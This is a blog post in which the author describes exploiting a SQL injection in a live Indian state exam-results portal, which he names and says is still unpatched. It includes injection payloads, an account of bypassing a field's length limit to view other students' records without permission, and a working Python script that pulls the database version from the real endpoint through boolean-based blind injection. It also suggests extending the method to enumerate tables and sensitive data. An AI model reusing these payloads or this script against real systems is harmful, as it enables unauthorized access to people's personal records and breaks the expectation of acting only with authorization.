Hello guys, I am Adithya M S, a guy passionate about exploring hidden endpoints in web services and websites, trying to dig deeper into them.

Today, I shall share my findings on how I hacked Karnataka NIC portal surprisingly simply through an SQL injection technique.

Disclaimer: The content provided in this article is for educational and informational purposes only. Always ensure you have proper authorization before conducting security assessments. Use this information responsibly

The website is none other than karresults.nic.in. My brother gave his KCET exam a few months back and I went to this portal to check his results when they arrived on 24th May. The page to check results looks like this

The URL of the results login page is https://karresults.nic.in/slindfirst_25.asp

At first I entered his application number and first four letters of his name in the respective fields and I was able to retreive his result.

After this, my hacky mind starting thinking of an SQL injection plan. I just entered a “random” value of 123456789 in the application number field and A’ OR 1=1; — in the name field. There was a maxlength=4 restriction on the name field but I just inspected the element to change it. Then surprise, surprise I got to see somebody else’s result records.

Now I tried the same think with A’ OR 1=2; —

I got the response

Yes!! Indeed the website uses user input directly in the SQL query to fetch the results.

We get a different response based on the truth value of the OR condition. Wow! This lends itself to a classic boolean based SQL injection.

import requests
# Microsoft SQL Server 2012 (SP2-GDR) (KB3194719) - 11.0.5388.0 (X64) 
#         Sep 23 2016 16:56:29
# A' OR SUBSTRING(CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), @@VERSION), 1), 3, 1) LIKE '4%';--
domain = "karresults.nic.in"
resource = "slrespage_2025.asp"
url = f"https://{domain}/{resource}"
def get_yn(query):
 data = {'frm_tokens': '0.8958377', 'reg': '123456789', 'name': f"A' OR {query};--"}
 res = requests.post(url, data=data)
 content_length = int(res.headers['Content-Length'])
 if content_length == 10796:
  return True
 elif content_length == 2511:
  return False
 else:
  return Exception("Something is wrong with your exploit... Please change it")
def get_ms_sql_version():
 map = ["('8', '9', 'a', 'b', 'c', 'd', 'e', 'f')", "('4', '5', '6', '7', 'c', 'd', 'e', 'f')",
        "('2', '6', 'a', 'e', '3', '7', 'b', 'f')", "('1', '3', '5', '7', '9', 'b', 'd', 'f')"]
 count = 0
 found_ver_str = ""
 while get_yn(f"LENGTH(@@VERSION) > {count}"):
  cval = 0
  for i in range(2):
   for h in range(4):
    cval *= 2
    cval += int(get_yn(f"SUBSTRING(CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), @@VERSION), 1), {3+2*count+i}, 1) IN {map[h]}"))
  found_ver_str += chr(cval)
  print("Ver found till now: ", found_ver_str)
  count += 1
 print("Hurray, we got it!!")
 return found_ver_str
get_ms_sql_version()

Let us put this vulnerability to action by retreiving the version of the SQL database system.

I guessed that it uses Microsoft SQL server as VERSION() function made the server hang possibly due to a server error.

Version string is represented as @@VERSION in Microsoft SQL Server.

Notice that the web form sends a POST request to /slrespage_2025.asp with our input data as parameters by observing the action attribute of the form element of the page.

Therefore, our Python program also sends POST request to this endpoint to get the results as the response.

The above Python program runs a query to get the hex encoded string of @@VERSION and send four requests to check whether the character is in 4 different lists to get each bit of the binary encoding of the character and thus deduce one character with four requests.

Then we add this character to the found_ver_str variable and check whether @@VERSION has a higher length than the number of characters we found and run this process iteratively.

Let’s see this program in action

Now after this, we can all understand that this could be used to get any string from the database, and possibly enumerate all values in a particular field too (If these YES or NO answers are used in a clever way). For example, one could enumerate all table names in the database and enumerate all column names in a particular table after which values of this column may well reveal sensitive information.

So, I tried reporting this vulnerability in a couple of ways.

I mailed to [email protected].. I got NO response

After this I also raised a ticket with the same content in NIC ServiceDesk. They simply replied that it is out of their scope.

Unfortunately, this bug is still not resolved. Please do respond to this blog by letting me know who and how can this security issue be resolved.

I hope you guys had a nice time reading about my practical experience with web bugs. I shall bring more such articles if you like this one.

Please do respond with your valuable feedback and give me some claps 👏 if you liked this one as these small gestures push me towards building better content. Also follow me to get regular notifications of content published my me..

Happy hacking and see you all next time !!